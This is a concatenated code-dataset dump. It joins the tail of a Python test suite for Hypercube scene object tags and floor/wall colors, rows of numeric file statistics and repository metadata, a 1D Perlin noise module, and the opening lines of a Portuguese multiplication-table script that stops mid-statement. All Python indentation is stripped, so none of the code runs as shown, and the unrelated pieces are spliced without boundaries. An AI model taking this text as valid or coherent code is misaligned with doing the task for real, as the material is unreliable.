assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_category():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
obstacle['debug']['untrainedCategory'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained', 'untrained category'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'untrained category', 'trained color', 'trained shape',
'trained size', 'uncontained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['obstacle']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['obstacle']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_color():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
obstacle['debug']['untrainedColor'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained', 'untrained color',
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'untrained color', 'trained shape', 'trained size',
'uncontained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['obstacle']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['obstacle']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_combination():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
obstacle['debug']['untrainedCombination'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained', 'untrained combination'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'untrained combination',
'trained shape', 'trained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['obstacle']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['obstacle']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_shape():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
obstacle['debug']['untrainedShape'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained',
'untrained shape'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'untrained shape',
'trained size', 'uncontained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['obstacle']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['obstacle']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_obstacle_untrained_size():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
obstacle['debug']['untrainedSize'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained', 'untrained size'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'untrained size', 'uncontained'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['obstacle']
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['obstacle']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_obstacle_enclosed_untrained_everything():
hypercube = MockHypercube()
target = create_tags_test_object_1()
obstacle = create_tags_test_object_2()
obstacle['locationParent'] = 'parent'
obstacle['debug']['untrainedCategory'] = True
obstacle['debug']['untrainedColor'] = True
obstacle['debug']['untrainedShape'] = True
obstacle['debug']['untrainedSize'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained', 'contained',
'untrained category', 'untrained color', 'untrained shape',
'untrained size'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'untrained category', 'untrained color', 'untrained shape',
'untrained size', 'contained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'trained category', 'trained color', 'trained combination',
'trained shape', 'trained size', 'uncontained'
}
assert not scene['goal']['sceneInfo']['contained']['target']
assert not scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['uncontained']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCategory']['target']
assert not scene['goal']['sceneInfo']['untrainedColor']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert not scene['goal']['sceneInfo']['untrainedShape']['target']
assert not scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['contained']['obstacle']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCategory']['target']
assert scene['goal']['sceneInfo']['trainedColor']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['trainedShape']['target']
assert scene['goal']['sceneInfo']['trainedSize']['target']
assert scene['goal']['sceneInfo']['uncontained']['target']
assert scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def test_Hypercube_tags_target_obstacle_enclosed_untrained_everything():
hypercube = MockHypercube()
target = create_tags_test_object_1()
target['locationParent'] = 'parent'
target['debug']['untrainedCategory'] = True
target['debug']['untrainedColor'] = True
target['debug']['untrainedShape'] = True
target['debug']['untrainedSize'] = True
obstacle = create_tags_test_object_2()
obstacle['locationParent'] = 'parent'
obstacle['debug']['untrainedCategory'] = True
obstacle['debug']['untrainedColor'] = True
obstacle['debug']['untrainedShape'] = True
obstacle['debug']['untrainedSize'] = True
scene = hypercube.get_scenes()[0]
print(f'{scene}')
scene = update_scene_objects(
scene,
{'target': [target], 'obstacle': [obstacle]}
)
assert set(scene['goal']['objectsInfo']['all']) == {
'target', 'obstacle',
'tiny', 'light', 'blue', 'plastic', 'ball',
'medium', 'light', 'yellow', 'plastic', 'cube',
'untrained category', 'untrained color', 'untrained shape',
'untrained size', 'contained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['obstacle']) == {
'medium', 'light', 'yellow', 'plastic', 'cube',
'untrained category', 'untrained color', 'untrained shape',
'untrained size', 'contained', 'trained combination'
}
assert set(scene['goal']['objectsInfo']['target']) == {
'tiny', 'light', 'blue', 'plastic', 'ball',
'untrained category', 'untrained color', 'untrained shape',
'untrained size', 'contained', 'trained combination'
}
assert not scene['goal']['sceneInfo']['trainedCategory']['obstacle']
assert not scene['goal']['sceneInfo']['trainedCategory']['target']
assert not scene['goal']['sceneInfo']['trainedColor']['obstacle']
assert not scene['goal']['sceneInfo']['trainedColor']['target']
assert not scene['goal']['sceneInfo']['trainedShape']['obstacle']
assert not scene['goal']['sceneInfo']['trainedShape']['target']
assert not scene['goal']['sceneInfo']['trainedSize']['obstacle']
assert not scene['goal']['sceneInfo']['trainedSize']['target']
assert not scene['goal']['sceneInfo']['uncontained']['obstacle']
assert not scene['goal']['sceneInfo']['uncontained']['target']
assert not scene['goal']['sceneInfo']['untrainedCombination']['obstacle']
assert not scene['goal']['sceneInfo']['untrainedCombination']['target']
assert scene['goal']['sceneInfo']['contained']['obstacle']
assert scene['goal']['sceneInfo']['contained']['target']
assert scene['goal']['sceneInfo']['present']['obstacle']
assert scene['goal']['sceneInfo']['present']['target']
assert scene['goal']['sceneInfo']['trainedCombination']['obstacle']
assert scene['goal']['sceneInfo']['trainedCombination']['target']
assert scene['goal']['sceneInfo']['untrainedCategory']['obstacle']
assert scene['goal']['sceneInfo']['untrainedCategory']['target']
assert scene['goal']['sceneInfo']['untrainedColor']['obstacle']
assert scene['goal']['sceneInfo']['untrainedColor']['target']
assert scene['goal']['sceneInfo']['untrainedShape']['obstacle']
assert scene['goal']['sceneInfo']['untrainedShape']['target']
assert scene['goal']['sceneInfo']['untrainedSize']['obstacle']
assert scene['goal']['sceneInfo']['untrainedSize']['target']
assert scene['goal']['sceneInfo']['count']['all'] == 2
assert scene['goal']['sceneInfo']['count']['obstacle'] == 1
assert scene['goal']['sceneInfo']['count']['target'] == 1
def retrieve_object_list_from_data(object_data):
return [object_data]
def test_update_floor_and_walls():
template = {
'floorMaterial': [],
'wallMaterial': [],
'debug': {
'floorColors': [],
'wallColors': []
}
}
for color_1 in [
'black', 'blue', 'brown', 'green', 'grey', 'orange', 'purple',
'red', 'white', 'yellow'
]:
print(f'COLOR_1 {color_1}')
# Test with no objects
body_template = copy.deepcopy(template)
body_template['debug']['floorColors'] = [color_1]
body_template['floorMaterial'] = [color_1]
body_template['debug']['wallColors'] = [color_1]
body_template['wallMaterial'] = [color_1]
role_to_object_data_list = {}
scenes = [copy.deepcopy(body_template), copy.deepcopy(body_template)]
update_floor_and_walls(
body_template,
role_to_object_data_list,
retrieve_object_list_from_data,
scenes
)
for scene in scenes:
assert scene['debug']['floorColors'] == [color_1]
assert scene['floorMaterial'] == [color_1]
assert scene['debug']['wallColors'] == [color_1]
assert scene['wallMaterial'] == [color_1]
# Test with one object
body_template = copy.deepcopy(template)
body_template['debug']['floorColors'] = [color_1]
body_template['floorMaterial'] = [color_1]
body_template['debug']['wallColors'] = [color_1]
body_template['wallMaterial'] = [color_1]
role_to_object_data_list = {
'target': [{'debug': {'color': [color_1]}}]
}
scenes = [copy.deepcopy(body_template), copy.deepcopy(body_template)]
update_floor_and_walls(
body_template,
role_to_object_data_list,
retrieve_object_list_from_data,
scenes
)
for scene in scenes:
assert scene['debug']['floorColors'] != [color_1]
assert scene['floorMaterial'] != [color_1]
assert scene['debug']['wallColors'] != [color_1]
assert scene['wallMaterial'] != [color_1]
for color_2 in [
'black', 'blue', 'brown', 'green', 'grey', 'orange', 'purple',
'red', 'white', 'yellow'
]:
if color_1 == color_2:
continue
print(f'COLOR_2 {color_2}')
# Test with one objects
body_template = copy.deepcopy(template)
body_template['debug']['floorColors'] = [color_1]
body_template['floorMaterial'] = [color_1]
body_template['debug']['wallColors'] = [color_2]
body_template['wallMaterial'] = [color_2]
role_to_object_data_list = {
'target': [{'debug': {'color': [color_1]}}]
}
scenes = [
copy.deepcopy(body_template),
copy.deepcopy(body_template)
]
update_floor_and_walls(
body_template,
role_to_object_data_list,
retrieve_object_list_from_data,
scenes
)
for scene in scenes:
assert scene['debug']['floorColors'] != [color_1]
assert scene['floorMaterial'] != [color_1]
assert scene['debug']['wallColors'] == [color_2]
assert scene['wallMaterial'] == [color_2]
# Test with multiple objects
body_template = copy.deepcopy(template)
body_template['debug']['floorColors'] = [color_1]
body_template['floorMaterial'] = [color_1]
body_template['debug']['wallColors'] = [color_2]
body_template['wallMaterial'] = [color_2]
role_to_object_data_list = {
'target': [{'debug': {'color': [color_1]}}],
'non_target': [{'debug': {'color': [color_2]}}]
}
scenes = [
copy.deepcopy(body_template),
copy.deepcopy(body_template)
]
update_floor_and_walls(
body_template,
role_to_object_data_list,
retrieve_object_list_from_data,
scenes
)
for scene in scenes:
assert scene['debug']['floorColors'] != [color_1]
assert scene['debug']['floorColors'] != [color_2]
assert scene['floorMaterial'] != [color_1]
assert scene['floorMaterial'] != [color_2]
assert scene['debug']['wallColors'] != [color_2]
assert scene['debug']['wallColors'] != [color_1]
assert scene['wallMaterial'] != [color_2]
assert scene['wallMaterial'] != [color_1]
| 45.74114
| 79
| 0.621236
| 5,721
| 59,372
| 6.357105
| 0.023772
| 0.124722
| 0.222222
| 0.172895
| 0.965438
| 0.957711
| 0.952157
| 0.947538
| 0.941351
| 0.940829
| 0
| 0.003911
| 0.173179
| 59,372
| 1,297
| 80
| 45.776407
| 0.736953
| 0.001516
| 0
| 0.808696
| 0
| 0
| 0.40557
| 0.000439
| 0
| 0
| 0
| 0
| 0.456522
| 1
| 0.025217
| false
| 0
| 0.002609
| 0.004348
| 0.033043
| 0.01913
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
889552c4e292da89f64010a9aa84d9705edea890
| 3,214
|
py
|
Python
|
processing/fbm/simplex.py
|
sol-ansano-kim/noise
|
5213ac122cf9307d075dcef955547458e35bce81
|
[
"MIT"
] | null | null | null |
processing/fbm/simplex.py
|
sol-ansano-kim/noise
|
5213ac122cf9307d075dcef955547458e35bce81
|
[
"MIT"
] | null | null | null |
processing/fbm/simplex.py
|
sol-ansano-kim/noise
|
5213ac122cf9307d075dcef955547458e35bce81
|
[
"MIT"
] | 1
|
2021-04-29T12:39:01.000Z
|
2021-04-29T12:39:01.000Z
|
# Noise1234 Stefan Gustavson (stegu@itn.liu.se)
# Ken Perlin at Siggraph 2002
Perm = [151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96, 53, 194, 233, 7, 225,
140, 36, 103, 30, 69, 142, 8, 99, 37, 240, 21, 10, 23, 190, 6, 148,
247, 120, 234, 75, 0, 26, 197, 62, 94, 252, 219, 203, 117, 35, 11, 32,
57, 177, 33, 88, 237, 149, 56, 87, 174, 20, 125, 136, 171, 168, 68, 175,
74, 165, 71, 134, 139, 48, 27, 166, 77, 146, 158, 231, 83, 111, 229,
122, 60, 211, 133, 230, 220, 105, 92, 41, 55, 46, 245, 40, 244, 102,
143, 54, 65, 25, 63, 161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89,
18, 169, 200, 196, 135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173,
186, 3, 64, 52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255,
82, 85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101, 155,
167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113, 224, 232,
178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193, 238, 210, 144,
12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14, 239, 107, 49, 192,
214, 31, 181, 199, 106, 157, 184, 84, 204, 176, 115, 121, 50, 45, 127,
4, 150, 254, 138, 236, 205, 93, 222, 114, 67, 29, 24, 72, 243, 141, 128,
195, 78, 66, 215, 61, 156, 180, 151, 160, 137, 91, 90, 15, 131, 13, 201,
95, 96, 53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94, 252,
219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87, 174, 20,
125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48, 27, 166, 77,
146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230, 220, 105, 92, 41,
55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63, 161, 1, 216, 80, 73,
209, 76, 132, 187, 208, 89, 18, 169, 200, 196, 135, 130, 116, 188, 159,
86, 164, 100, 109, 198, 173, 186, 3, 64, 52, 217, 226, 250, 124, 123, 5,
202, 38, 147, 118, 126, 255, 82, 85, 212, 207, 206, 59, 227, 47, 16, 58,
17, 182, 189, 28, 42, 223, 183, 170, 213, 119, 248, 152, 2, 44, 154,
163, 70, 221, 153, 101, 155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98,
108, 110, 79, 113, 224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251,
34, 242, 193, 238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235,
249, 14, 239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204,
176, 115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180]
def fade(t):
return (t * t * t * (t * (t * 6 - 15) + 10))
def floor(x):
return int(x) if x > 0 else int(x) - 1
def lerp(v1, v2, w):
return v1 + w * float(v2 - v1)
def gradient(hash, x):
h = hash & 15
grad = 1 + (h & 7)
if (h & 8):
grad *= -1
return (grad * x)
def noise(x):
ix0 = floor(x)
fx0 = x - ix0
fx1 = fx0 - 1.0
ix1 = (ix0 + 1) & 0xff
ix0 = ix0 & 0xff
s = fade(fx0)
return 0.188 * lerp(gradient(Perm[ix0], fx0), gradient(Perm[ix1], fx1), s)
| 45.914286
| 80
| 0.506845
| 616
| 3,214
| 2.644481
| 0.477273
| 0.004911
| 0.005525
| 0.013505
| 0.807858
| 0.807858
| 0.807858
| 0.807858
| 0.807858
| 0.807858
| 0
| 0.60856
| 0.302116
| 3,214
| 69
| 81
| 46.57971
| 0.1177
| 0.022713
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002549
| 0
| 0
| 1
| 0.09434
| false
| 0
| 0
| 0.056604
| 0.188679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ee0349f14e250a2c831e6cba59f686a29bc45991
| 1,456
|
py
|
Python
|
Curso_Gustavo_Guanabara/Exercico(Tabuada).py
|
Nathan120/Arq_Python_CursoEmVideo
|
d6269eeaa8db57d1ffa8ed66e1936a061803f37e
|
[
"MIT"
] | null | null | null |
Curso_Gustavo_Guanabara/Exercico(Tabuada).py
|
Nathan120/Arq_Python_CursoEmVideo
|
d6269eeaa8db57d1ffa8ed66e1936a061803f37e
|
[
"MIT"
] | null | null | null |
Curso_Gustavo_Guanabara/Exercico(Tabuada).py
|
Nathan120/Arq_Python_CursoEmVideo
|
d6269eeaa8db57d1ffa8ed66e1936a061803f37e
|
[
"MIT"
] | null | null | null |
print('----------TABUADA------')
while True:
escolha = int(input('Ecolha o número para mostra na Tabela(0-9) = '))
if escolha == 0:
